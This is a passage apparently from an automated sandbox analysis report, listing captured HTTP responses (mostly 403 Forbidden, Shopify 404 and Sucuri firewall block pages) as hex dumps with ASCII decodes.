77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:47 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:47 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:07:40 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: eca84465-401f-4eb6-98f4-3463c454b273CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L59gh%2BQS%2BIcq5ZCo6a7IZzd8Bq2OQEeox0afaIoKfM2HWn9O3ZHDTGWCv7po9mjYqa8%2FpRVl1BesUA2vXGKkAUndQRhWypRRGJPcmp%2BNne7QJIjh3dM57wNHA2Mc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=147.000074Server: cloudflareCF-RAY: 7e1d6e047cdb372e-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:48 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:48 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 996be642-68d1-4dac-bc6a-19ae80913e87CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W3ak%2BD6BpX8jojCyyfaPsDIxiG6D23QdFT%2Fkjb8gfae7P4PvV9SE11g4t8D3oEwrn5ehzkHTqhTZKjQum4chG2LfjAFXRLlxEeW8CfTIJcRYNFzOywfW8zC4Upa5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=147.000074Server: cloudflareCF-RAY: 7e1d6e066f59bb73-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:48 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:48 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:07:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 